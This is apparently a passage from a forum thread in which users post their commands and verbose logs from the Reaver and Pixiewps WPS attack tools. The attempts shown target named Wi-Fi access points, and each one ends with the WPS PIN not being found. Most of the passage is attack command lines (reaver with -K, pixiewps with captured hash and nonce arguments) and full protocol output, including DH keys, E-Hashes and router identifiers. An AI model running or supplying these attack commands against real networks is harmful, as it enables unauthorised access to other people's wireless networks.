    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    send_packet called from send_msg() send.c:116
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    WPS: Invalidating used wildcard PIN
    WPS: Invalidated PIN for UUID - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 5c 4c a9 36 90 ec
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=8):
    31 32 33 34 35 36 37 30 12345670
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin "12345670"
    send_packet called from deauthenticate() 80211.c:326
    send_packet called from authenticate() 80211.c:357
    [+] Sending authentication request
    send_packet called from associate() 80211.c:410
    [+] Sending association request
    [+] Associated with 5C:4C:A9:36:90:EC (ESSID: INFINITUMd064)
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    WPS: Processing received message (len=424 op_code=4)
    WPS: Received WSC_MSG
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 5c 4c a9 36 90 ec
    WPS: Enrollee MAC Address 5c:4c:a9:36:90:ec
    WPS: Enrollee Nonce - hexdump(len=16): 50 85 99 07 aa 05 3d 85 49 48 8b 71 b3 5a a7 26
    WPS: Enrollee Authentication Type flags 0x3f
    WPS: No match in supported authentication types (own 0x0 Enrollee 0x3f)
    WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
    WPS: Enrollee Encryption Type flags 0xf
    WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
    WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
    WPS: Enrollee Connection Type flags 0x1
    WPS: Enrollee Config Methods 0x84 [Label] [PBC]
    WPS: Prefer PSK format key due to Enrollee not supporting display
    WPS: Enrollee Wi-Fi Protected Setup State 2
    WPS: Manufacturer - hexdump_ascii(len=24):
    52 61 6c 69 6e 6b 20 54 65 63 68 6e 6f 6c 6f 67 Ralink Technolog
    79 2c 20 43 6f 72 70 2e y, Corp.
    WPS: Model Name - hexdump_ascii(len=28):
    52 61 6c 69 6e 6b 20 57 69 72 65 6c 65 73 73 20 Ralink Wireless
    41 63 63 65 73 73 20 50 6f 69 6e 74 Access Point
    WPS: Model Number - hexdump_ascii(len=6):
    52 54 32 38 36 30 RT2860
    WPS: Serial Number - hexdump_ascii(len=8):
    31 32 33 34 35 36 37 38 12345678
    WPS: Primary Device Type: 6-0050F204-1
    WPS: Device Name - hexdump_ascii(len=11):
    54 72 65 6e 64 43 68 69 70 41 50 TrendChipAP
    WPS: Enrollee RF Bands 0x1
    WPS: Enrollee Association State 0
    WPS: Device Password ID 4
    WPS: Enrollee Configuration Error 2
    WPS: OS Version 80000000
    WPS: M1 Processed
    WPS: Unsupported Device Password ID 4
    WPS: WPS_CONTINUE, Freeing Last Message
    WPS: WPS_CONTINUE, Saving Last Message
    WPS: returning
    [+] Received M1 message
    WPS: Found a wildcard PIN. Assigned it for this UUID-E
    WPS: Registrar Nonce - hexdump(len=16): a5 ad 35 47 f9 b2 f4 54 af 48 4d ec 82 53 22 81
    WPS: UUID-R - hexdump(len=16): d1 7b f7 dd 89 20 1d 11 18 64 f3 be 06 eb 94 49
    WPS: Building Message M2
    WPS: * Version
    WPS: * Message Type (5)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * UUID-R
    WPS: * Public Key
    WPS: Generate new DH keys
    DH: private value - hexdump(len=192): bc 65 7c d1 4e 18 f8 83 1e 5f aa f4 d3 0d b5 42 7a a4 d9 4e 2d b8 c2 ae a6 d3 6f 8c 92 2e e9 cb 62 7a ee 8f 06 2
    DH: public value - hexdump(len=192): 45 8d d6 30 7e 59 e4 12 19 0d 34 3a ec e1 30 d7 d1 b6 61 f8 1b ef 19 ed 42 6e fc f2 61 67 0f 46 25 de 1b 37 b1 86
    WPS: DH Private Key - hexdump(len=192): bc 65 7c d1 4e 18 f8 83 1e 5f aa f4 d3 0d b5 42 7a a4 d9 4e 2d b8 c2 ae a6 d3 6f 8c 92 2e e9 cb 62 7a ee 8f 06
    WPS: DH own Public Key - hexdump(len=192): 45 8d d6 30 7e 59 e4 12 19 0d 34 3a ec e1 30 d7 d1 b6 61 f8 1b ef 19 ed 42 6e fc f2 61 67 0f 46 25 de 1b 37
    WPS: DH Private Key - hexdump(len=192): bc 65 7c d1 4e 18 f8 83 1e 5f aa f4 d3 0d b5 42 7a a4 d9 4e 2d b8 c2 ae a6 d3 6f 8c 92 2e e9 cb 62 7a ee 8f 06
    WPS: DH peer Public Key - hexdump(len=192): 55 8b fa 40 d4 15 be f1 6a bf 80 45 06 40 6d ad 17 c2 26 f6 64 ee 0b 29 78 b1 c1 7e b4 d3 2e 8b 0a 5d 97 2
    DH: shared key - hexdump(len=192): a3 51 cc 16 45 90 73 9b 04 47 48 5c 36 c2 02 a7 78 70 15 a2 aa 93 51 e4 14 95 39 91 7c 3b 66 1e 3b bc f9 0f 40 f3 e
    WPS: DH shared key - hexdump(len=192): a3 51 cc 16 45 90 73 9b 04 47 48 5c 36 c2 02 a7 78 70 15 a2 aa 93 51 e4 14 95 39 91 7c 3b 66 1e 3b bc f9 0f 40
    WPS: DHKey - hexdump(len=32): 5f 42 cb 57 80 99 db 15 8d 89 dc 25 bf df 4c fa 64 29 1e 0b e1 07 00 bc b2 fd 4f e4 02 69 e3 26
    WPS: KDK - hexdump(len=32): 26 17 a1 9e 6c e4 16 c9 4b 9c e4 61 2d 1d 7e f2 b8 8a b4 55 bb 32 1c 9f 5d 01 fc 12 f2 0e 29 27
    WPS: AuthKey - hexdump(len=32): 0a a8 29 70 83 51 9f 5e 80 4d 6a 67 3c e0 c4 81 8e 22 7b 0d 04 55 b5 6e 53 5c 24 4b 1c 34 49 7a
    WPS: KeyWrapKey - hexdump(len=16): 02 42 4e 30 cf 51 f7 c9 0a 96 92 ae df 4e fa ec
    WPS: EMSK - hexdump(len=32): 20 46 6f da 65 98 59 fd a6 3a 5e 2a 73 bc 26 c1 0f fc 24 9e 03 37 1f fd 74 1f 94 67 3e 43 ce 11
    WPS: * Authentication Type Flags
    WPS: * Encryption Type Flags
    WPS: * Connection Type Flags
    WPS: * Config Methods (8c)
    WPS: * Manufacturer
    WPS: * Model Name
    WPS: * Model Number
    WPS: * Serial Number
    WPS: * Primary Device Type
    WPS: * Device Name
    WPS: * RF Bands (0)
    WPS: * Association State
    WPS: * Configuration Error (0)
    WPS: * Device Password ID (4)
    WPS: * OS Version
    WPS: * Authenticator
    [+] Sending M2 message
    send_packet called from send_msg() send.c:116
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    WPS: Processing received message (len=114 op_code=4)
    WPS: Received WSC_MSG
    WPS: Parsed WSC_MSG
    WPS: Received M3
    WPS: E-Hash1 - hexdump(len=32): f4 f5 43 ff 63 02 7a d9 fe ff a8 15 d0 55 1d 11 d0 38 b2 ce 0b 41 c0 dc 5e a4 7f 2b c3 47 c2 eb
    WPS: E-Hash2 - hexdump(len=32): 12 63 bd 43 70 45 5f 33 df 78 bf 05 36 d2 80 a3 de 12 c3 f9 b6 81 36 2e 91 af b3 b2 19 ff f1 fd
    executing pixiewps -e 558bfa40d415bef16abf804506406dad17c226f664ee0b2978 b1c17eb4d32e8b0a5d9727e2075fe5f41978827d1cae18e1f1 dffb96e5abda7834f25b6c7ba57a
    Pixiewps 1.4

    [-] WPS pin not found!

    [*] Time taken: 10 s 317 ms

    code reaver -vvv -i mon0 -b 5C:4C:A9:36:90:EC -K 1 -c 1

  14. #14
    reaver -i wlan1mon -b 00:1D4:F9:4C:10 -c 11 -vv -N -Z

    Reaver v1.6.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

    [+] Switching wlan1mon to channel 11
    [+] Waiting for beacon from 00:1D4:F9:4C:10
    [+] Received beacon from 00:1D4:F9:4C:10
    [+] Vendor: RalinkTe
    [+] Trying pin "12345670"
    [+] Sending authentication request
    [+] Sending association request
    [+] Associated with 00:1D4:F9:4C:10 (ESSID: HOME-4C12)
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    executing pixiewps -e 46fe047eee49f8c8d7e5011200dac0ad984d4ddd42de801155 be191dfc2d7db06ae2b66a5bbcc64383ec42e6388d0ab0d6d8 adeac661bc13bcc201782d445171b2c4005a1eb0effc8439d1 ed5e6162f118513cae5fec90bf9ef285bba0103fafb8446c3e a8f73c3b8d88faeb2aaaa4506a0c05dea22fc967b8f3be2340 527e720816e2f8e3f1543248833c1d6bae3778792a1824bd04 5120a7ade08aa949a87a4d72b837159de1851f95bf42f96d2a ceb1c22c0b4cd93cbe7514582a7c160f7a -s 035604ba8dc9788ddfcb8abf80ea4543a1620490b4b25f8f80 467feda81c0c17 -z 11f487100e2e6741ea53ddc3e1f169873dec9cd1db30d97a16 7793eeda6761f3 -a 1c592a6f11e8dc56cf298a34eeb7182db238788b2dc9d28cb1 2190cb985adc1e -n f20a06216acc9a3be572bf003d456ead -r a8e2a9af8c7609af0f1e55d46fd8204d33a1b4a7303932cbd6 8b9ef9937a3b9bb5c1444dff6278c74f09c3c071fd4e18ece1 9003ebb1b0285fdb035193ca3d3d695056ae3b420bac62028f dfdbe639ab6679a7f773698da6924caf4a4ff5ad34fe0258dc 5f97178d2054c72d7e5465bb4d301da22dc27c9ff41f7588e6 96a342926f616e44fe58a88d5ea524bf29153cf7373125f6f5 ab884c9f12cd4a23b251792ed88580daecfbb258b07cbac850 f53307ff52915fa7448e04815c6e284b46

    Pixiewps 1.4

    [-] WPS pin not found!
    [*] Time taken: 0 s 207 ms

    [@] Looks like you have some interesting data! Please consider contributing with your data to improve pixiewps. Follow the instructions on http://0x0.st/tm - Thank you!

  15. #15
    Join Date
    2018-May
    Posts
    1
    I Did Run the comand as mentioned above Twice
    I also ran Pixiewps with the data collected from reaver with -f
    WASH DATA :

    Code:
    bssid"  : "1C:5F:2B:06:A4:18", "essid" : "TRIAL", "channel" : 7, "rssi" :  -78,  "vendor_oui" : "00E04C", "wps_version" : 32, "wps_state" : 2,   "wps_locked" : 2, "wps_manufacturer" : "D-Link Corp.", "wps_model_name" :   "RTL8xxx", "wps_model_number" : "EV-2010-09-20", "wps_device_name" :   "RTL8196d", "wps_serial" : "123456789012347", "wps_uuid" :   "112233445566778899aa1c5f2b06a418", "wps_response_type" : "03",   "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" :   "2008", "wps_rf_bands" : "03", "dummy": 0}
    __________________________________________________ __________________________________________________ ___
    Code:
    root@kali:~# reaver -i wlan0mon -b 1C:5F:2B:06:A4:18 -c 7 -vvv -K -f 
    
    Reaver v1.6.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    
    [+] Switching wlan0mon to channel 7
    [?] Restore previous session for 1C:5F:2B:06:A4:18? [n/Y] n
    [+] Waiting for beacon from 1C:5F:2B:06:A4:18
    [+] Received beacon from 1C:5F:2B:06:A4:18
    [+] Vendor: RealtekS
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=8):
         31 32 33 34 35 36 37 30                           12345670        
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin "12345670"
    send_packet called from deauthenticate() 80211.c:333
    send_packet called from authenticate() 80211.c:364
    [+] Sending authentication request
    [!] Found packet with bad FCS, skipping...
    send_packet called from associate() 80211.c:417
    [+] Sending association request
    [+] Associated with 1C:5F:2B:06:A4:18 (ESSID: TRIAL)
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    send_packet called from resend_last_packet() send.c:161
    WPS: Processing received message (len=412 op_code=4)
    WPS: Received WSC_MSG
    WPS: Unsupported attribute type 0x1049 len=6
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: UUID-E - hexdump(len=16): 11 22 33 44 55 66 77 88 99 aa 1c 5f 2b 06 a4 18
    WPS: Enrollee MAC Address 1c:5f:2b:06:a4:18
    WPS: Enrollee Nonce - hexdump(len=16): 7e e9 68 0c 07 a7 e6 b2 a1 86 c5 4c 02 e9 74 10
    WPS: Enrollee Authentication Type flags 0x21
    WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
    WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
    WPS: Enrollee Encryption Type flags 0x9
    WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
    WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
    WPS: Enrollee Connection Type flags 0x1
    WPS: Enrollee Config Methods 0x2688 [Display] [PBC]
    WPS: Enrollee Wi-Fi Protected Setup State 2
    WPS: Manufacturer - hexdump_ascii(len=12):
         44 2d 4c 69 6e 6b 20 43 6f 72 70 2e               D-Link Corp.    
    WPS: Model Name - hexdump_ascii(len=7):
         52 54 4c 38 78 78 78                              RTL8xxx         
    WPS: Model Number - hexdump_ascii(len=13):
         45 56 2d 32 30 31 30 2d 30 39 2d 32 30            EV-2010-09-20   
    WPS: Serial Number - hexdump_ascii(len=15):
         31 32 33 34 35 36 37 38 39 30 31 32 33 34 37      123456789012347 
    WPS: Primary Device Type: 6-0050F204-1
    WPS: Device Name - hexdump_ascii(len=8):
         52 54 4c 38 31 39 36 64                           RTL8196d        
    WPS: Enrollee RF Bands 0x2
    WPS: Enrollee Association State 0
    WPS: Device Password ID 0
    WPS: Enrollee Configuration Error 0
    WPS: OS Version 10000000
    WPS: M1 Processed
    WPS: dev_pw_id checked
    WPS: PBC Checked
    WPS: Entering State SEND_M2
    WPS: WPS_CONTINUE, Freeing Last Message
    WPS: WPS_CONTINUE, Saving Last Message
    WPS: returning
    [+] Received M1 message
    WPS: Found a wildcard PIN. Assigned it for this UUID-E
    WPS: Registrar Nonce - hexdump(len=16): 36 05 66 51 0c 1f 98 6a 32 38 17 2b 96 8a 54 6e
    WPS: UUID-R - hexdump(len=16): c9 41 d5 da 95 92 a6 97 d7 aa f9 de 6a bf 89 63
    WPS: Building Message M2
    WPS:  * Version
    WPS:  * Message Type (5)
    WPS:  * Enrollee Nonce
    WPS:  * Registrar Nonce
    WPS:  * UUID-R
    WPS:  * Public Key
    WPS: Generate new DH keys
    DH:  private value - hexdump(len=192): c6 56 3b a0 fe 3a 86 ba 4f c1 1b  bc  fc 1d 74 4b 67 15 74 ee 7a c9 f2 6b 89 ee 10 5f 16 d6 b8 62 57 f7 7f  14  f5 10 73 5c b2 84 56 71 ba 69 ed ce 24 6c 46 9a 6c eb e2 23 80 3c  74 3d  4f 0c 84 f9 d7 b7 c5 2a 24 85 09 aa 5e 11 e8 22 f7 a2 f1 9d ef 4d  38 24  00 07 99 38 8e 70 28 cc 02 53 f3 44 23 c0 71 e2 27 73 43 a2 ca  a9 22 dc  c5 12 cb 3b 3b dc 7b 63 a0 25 91 71 3a a8 ba e7 24 8a 44 19 ae  d2 20 c2  52 5e b2 1a f2 25 a4 3c ce 01 85 95 37 3c bd d3 f4 93 f6 18  91 e9 56 82  1a 3b c5 37 b1 6e b0 db 1a 77 a6 0f 13 7c af a3 3a 0f 64 8d  d4 f8 b1 5e  0c 62 d5 2f be 22 4f 94 ef 9f ad d0
    DH: public value -  hexdump(len=192): cd 96 10 77 9f 35 f5 de 13 61 82  8f 80 f7 09 da 98 80  08 bf ad 71 55 35 81 15 21 bc 5a 59 67 ba 2c 54 82  ac 46 3b 98 f4 97 55  48 61 fc 07 4a e0 ac 90 37 59 ec 73 90 09 1c 0d  e1 8c 3e 8b a9 6a 0c 51  ca dc 7f 04 6b 27 86 de 4e d9 dc 97 91 ac e9 fc  73 11 05 90 6c 46 ce 48  32 78 10 9e 94 ea 15 1e 50 7f 65 ef dc 50 e0  99 04 4d 59 e5 72 f8 9c a4  e7 16 af 8f 8a d9 60 f9 f4 e3 61 df f5 40 01  1c de e0 16 f9 ca 81 2f 6c  f5 58 1c 41 6d b6 74 ec c5 c9 75 9c 48 fc  e3 1a 8d d3 01 24 cf 95 cc 09  5c f1 5e 45 f1 24 26 cb d4 31 fa 09 02 20  28 2b 56 f5 8c 53 a7 99 0c 8f  23 f7 e4 0b 1e 38
    WPS: DH Private Key - hexdump(len=192): c6 56 3b a0  fe 3a 86 ba 4f c1  1b bc fc 1d 74 4b 67 15 74 ee 7a c9 f2 6b 89 ee 10 5f  16 d6 b8 62 57 f7  7f 14 f5 10 73 5c b2 84 56 71 ba 69 ed ce 24 6c 46 9a  6c eb e2 23 80  3c 74 3d 4f 0c 84 f9 d7 b7 c5 2a 24 85 09 aa 5e 11 e8 22  f7 a2 f1 9d ef  4d 38 24 00 07 99 38 8e 70 28 cc 02 53 f3 44 23 c0 71 e2  27 73 43 a2  ca a9 22 dc c5 12 cb 3b 3b dc 7b 63 a0 25 91 71 3a a8 ba e7  24 8a 44 19  ae d2 20 c2 52 5e b2 1a f2 25 a4 3c ce 01 85 95 37 3c bd d3  f4 93 f6  18 91 e9 56 82 1a 3b c5 37 b1 6e b0 db 1a 77 a6 0f 13 7c af a3  3a 0f 64  8d d4 f8 b1 5e 0c 62 d5 2f be 22 4f 94 ef 9f ad d0
    WPS: DH  own Public Key - hexdump(len=192): cd 96 10 77 9f 35 f5 de 13  61 82 8f  80 f7 09 da 98 80 08 bf ad 71 55 35 81 15 21 bc 5a 59 67 ba 2c  54 82 ac  46 3b 98 f4 97 55 48 61 fc 07 4a e0 ac 90 37 59 ec 73 90 09  1c 0d e1 8c  3e 8b a9 6a 0c 51 ca dc 7f 04 6b 27 86 de 4e d9 dc 97 91 ac  e9 fc 73 11  05 90 6c 46 ce 48 32 78 10 9e 94 ea 15 1e 50 7f 65 ef dc  50 e0 99 04 4d  59 e5 72 f8 9c a4 e7 16 af 8f 8a d9 60 f9 f4 e3 61 df f5  40 01 1c de e0  16 f9 ca 81 2f 6c f5 58 1c 41 6d b6 74 ec c5 c9 75 9c  48 fc e3 1a 8d d3  01 24 cf 95 cc 09 5c f1 5e 45 f1 24 26 cb d4 31 fa 09  02 20 28 2b 56 f5  8c 53 a7 99 0c 8f 23 f7 e4 0b 1e 38
    WPS: DH Private Key -  hexdump(len=192): c6 56 3b a0 fe 3a 86 ba 4f c1  1b bc fc 1d 74 4b 67 15  74 ee 7a c9 f2 6b 89 ee 10 5f 16 d6 b8 62 57 f7  7f 14 f5 10 73 5c b2 84  56 71 ba 69 ed ce 24 6c 46 9a 6c eb e2 23 80  3c 74 3d 4f 0c 84 f9 d7 b7  c5 2a 24 85 09 aa 5e 11 e8 22 f7 a2 f1 9d ef  4d 38 24 00 07 99 38 8e 70  28 cc 02 53 f3 44 23 c0 71 e2 27 73 43 a2  ca a9 22 dc c5 12 cb 3b 3b dc  7b 63 a0 25 91 71 3a a8 ba e7 24 8a 44 19  ae d2 20 c2 52 5e b2 1a f2 25  a4 3c ce 01 85 95 37 3c bd d3 f4 93 f6  18 91 e9 56 82 1a 3b c5 37 b1 6e  b0 db 1a 77 a6 0f 13 7c af a3 3a 0f 64  8d d4 f8 b1 5e 0c 62 d5 2f be 22  4f 94 ef 9f ad d0
    WPS: DH peer Public Key - hexdump(len=192): d0 14  1b 15 65 6e 96 b8 5f  ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28  c0 e1 ba f8 cf 91 66  43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25  5b e5 a8 77 0e 1f  a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63  d1 af 1d b0 c4 81  ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13  2a ea 2a 36 84  ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13  9d 77 f0 ac 58  07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa  8d d8 d6 61  be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92  17 76 0b 75  c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
    DH:  shared key - hexdump(len=192): 12 61 d7 7f 7a a5 63 2a 82 3d 52 00  26  ce 47 b2 81 d3 09 fb a8 3c 9e dd 9c 7c 21 45 93 95 73 10 4d cc 1c 1e  17  86 76 72 d8 17 8d 54 06 1f 1f 13 bb 8c c0 5c d7 e7 93 f9 99 7c fb  4f 42  84 5c 5b 4f 7c 3b 3d a2 c0 f5 26 29 f8 19 8d ad 1a d7 9e c9 12 f2  d8 d9  d0 04 7a 5d b9 85 c2 9c ea 1b c8 c7 db 5a dc 76 f8 fc 24 ff f2  0f 02 b3  d4 ec c0 68 8a e5 03 5a bf 58 6e d3 e6 c0 20 e2 d3 f5 36 40 40  be 3b df  40 31 aa 1f 5a 7f 8f b8 fe b2 74 02 2b 0c ec 0d 84 b6 d6 e1  a2 22 0f 64  01 27 9a b2 1c 90 a3 a0 7f ce 28 02 0c cb 9e d0 fc 18 2c 00  2a 56 1b da  18 b4 72 48 a1 30 92 bb 48 84 a7
    WPS: DH shared key -  hexdump(len=192): 12 61 d7 7f 7a a5 63 2a 82 3d 52  00 26 ce 47 b2 81 d3  09 fb a8 3c 9e dd 9c 7c 21 45 93 95 73 10 4d cc  1c 1e 17 86 76 72 d8 17  8d 54 06 1f 1f 13 bb 8c c0 5c d7 e7 93 f9 99 7c  fb 4f 42 84 5c 5b 4f 7c  3b 3d a2 c0 f5 26 29 f8 19 8d ad 1a d7 9e c9  12 f2 d8 d9 d0 04 7a 5d b9  85 c2 9c ea 1b c8 c7 db 5a dc 76 f8 fc 24 ff  f2 0f 02 b3 d4 ec c0 68 8a  e5 03 5a bf 58 6e d3 e6 c0 20 e2 d3 f5 36  40 40 be 3b df 40 31 aa 1f 5a  7f 8f b8 fe b2 74 02 2b 0c ec 0d 84 b6 d6  e1 a2 22 0f 64 01 27 9a b2 1c  90 a3 a0 7f ce 28 02 0c cb 9e d0 fc 18  2c 00 2a 56 1b da 18 b4 72 48 a1  30 92 bb 48 84 a7
    WPS: DHKey - hexdump(len=32): ad 59 c3 66 6f f2 5d 09 2b bf 69 98 dd b9 80 d5 de 15 19 ce 75 d5 52 1d a3 97 20 bb ae f8 d1 4d
    WPS: KDK - hexdump(len=32): 30 82 a2 06 ab 4b be bd 8a 3a 69 e1 7d c2 d9 1a 96 e6 97 75 91 19 df 9e 91 d7 40 06 29 b8 64 89
    WPS: AuthKey - hexdump(len=32): 01 81 09 14 51 74 29 6a 5f b8 10 2a f6 82 9c b7 b3 40 ae 0e 57 86 76 d3 50 d9 61 14 b9 b1 b1 a8
    WPS: KeyWrapKey - hexdump(len=16): 6a f9 5d a3 8b 61 45 e5 ef 9b 76 dd 08 77 cf 0f
    WPS: EMSK - hexdump(len=32): dc f8 0d 26 b4 dd f4 bf d5 ec a6 6a b1 22 22 28 1b 08 69 05 72 13 cc ea cb b8 cb 37 7b a0 43 27
    WPS:  * Authentication Type Flags
    WPS:  * Encryption Type Flags
    WPS:  * Connection Type Flags
    WPS:  * Config Methods (8c)
    WPS:  * Manufacturer
    WPS:  * Model Name
    WPS:  * Model Number
    WPS:  * Serial Number
    WPS:  * Primary Device Type
    WPS:  * Device Name
    WPS:  * RF Bands (0)
    WPS:  * Association State
    WPS:  * Configuration Error (0)
    WPS:  * Device Password ID (0)
    WPS:  * OS Version
    WPS:  * Authenticator
    [+] Sending M2 message
    send_packet called from send_msg() send.c:116
    send_packet called from resend_last_packet() send.c:161
    WPS: Processing received message (len=124 op_code=4)
    WPS: Received WSC_MSG
    WPS: Unsupported attribute type 0x1049 len=6
    WPS: Parsed WSC_MSG
    WPS: Received M3
    WPS: E-Hash1 - hexdump(len=32): 19 07 d8 f4 f4 8d f6 45 69 75 8c 6f 2d df 38 8c 7b bc 8a bc b5 c9 8c 39 b8 86 5d d9 19 dd 9d 4a
    WPS: E-Hash2 - hexdump(len=32): d8 15 59 67 86 d0 4d 68 86 cc 28 76 07 9a 57 5c ce 57 69 9d fc e1 33 2f 30 3c 45 62 01 2c a8 54
    executing  pixiewps -e   d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b   -s 1907d8f4f48df64569758c6f2ddf388c7bbc8abcb5c98c39b8865dd919dd9d4a -z   d815596786d04d6886cc2876079a575cce57699dfce1332f303c4562012ca854 -a   018109145174296a5fb8102af6829cb7b340ae0e578676d350d96114b9b1b1a8 -n   7ee9680c07a7e6b2a186c54c02e97410 -r   cd9610779f35f5de1361828f80f709da988008bfad715535811521bc5a5967ba2c5482ac463b98f497554861fc074ae0ac903759ec7390091c0de18c3e8ba96a0c51cadc7f046b2786de4ed9dc9791ace9fc731105906c46ce483278109e94ea151e507f65efdc50e099044d59e572f89ca4e716af8f8ad960f9f4e361dff540011cdee016f9ca812f6cf5581c416db674ecc5c9759c48fce31a8dd30124cf95cc095cf15e45f12426cbd431fa090220282b56f58c53a7990c8f23f7e40b1e38
    
     Pixiewps 1.4
    
     [-] WPS pin not found!
    
     [*] Time taken: 0 s 54 ms
    Code:
    root@kali:~# reaver -i wlan0mon -b 1C:5F:2B:06:A4:18 -c 7 -vvv -K -f 
    
    Reaver v1.6.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    
    [+] Switching wlan0mon to channel 7
    [?] Restore previous session for 1C:5F:2B:06:A4:18? [n/Y] n
    [+] Waiting for beacon from 1C:5F:2B:06:A4:18
    [+] Received beacon from 1C:5F:2B:06:A4:18
    [+] Vendor: RealtekS
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=8):
         31 32 33 34 35 36 37 30                           12345670        
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin "12345670"
    send_packet called from deauthenticate() 80211.c:333
    send_packet called from authenticate() 80211.c:364
    [+] Sending authentication request
    [!] Found packet with bad FCS, skipping...
    send_packet called from associate() 80211.c:417
    [+] Sending association request
    [+] Associated with 1C:5F:2B:06:A4:18 (ESSID: TRIAL)
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    WPS: Processing received message (len=412 op_code=4)
    WPS: Received WSC_MSG
    WPS: Unsupported attribute type 0x1049 len=6
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: UUID-E - hexdump(len=16): 11 22 33 44 55 66 77 88 99 aa 1c 5f 2b 06 a4 18
    WPS: Enrollee MAC Address 1c:5f:2b:06:a4:18
    WPS: Enrollee Nonce - hexdump(len=16): ce 12 19 30 9e c2 dc 9b d3 3a 70 ee f8 46 39 5b
    WPS: Enrollee Authentication Type flags 0x21
    WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
    WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
    WPS: Enrollee Encryption Type flags 0x9
    WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
    WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
    WPS: Enrollee Connection Type flags 0x1
    WPS: Enrollee Config Methods 0x2688 [Display] [PBC]
    WPS: Enrollee Wi-Fi Protected Setup State 2
    WPS: Manufacturer - hexdump_ascii(len=12):
         44 2d 4c 69 6e 6b 20 43 6f 72 70 2e               D-Link Corp.    
    WPS: Model Name - hexdump_ascii(len=7):
         52 54 4c 38 78 78 78                              RTL8xxx         
    WPS: Model Number - hexdump_ascii(len=13):
         45 56 2d 32 30 31 30 2d 30 39 2d 32 30            EV-2010-09-20   
    WPS: Serial Number - hexdump_ascii(len=15):
         31 32 33 34 35 36 37 38 39 30 31 32 33 34 37      123456789012347 
    WPS: Primary Device Type: 6-0050F204-1
    WPS: Device Name - hexdump_ascii(len=8):
         52 54 4c 38 31 39 36 64                           RTL8196d        
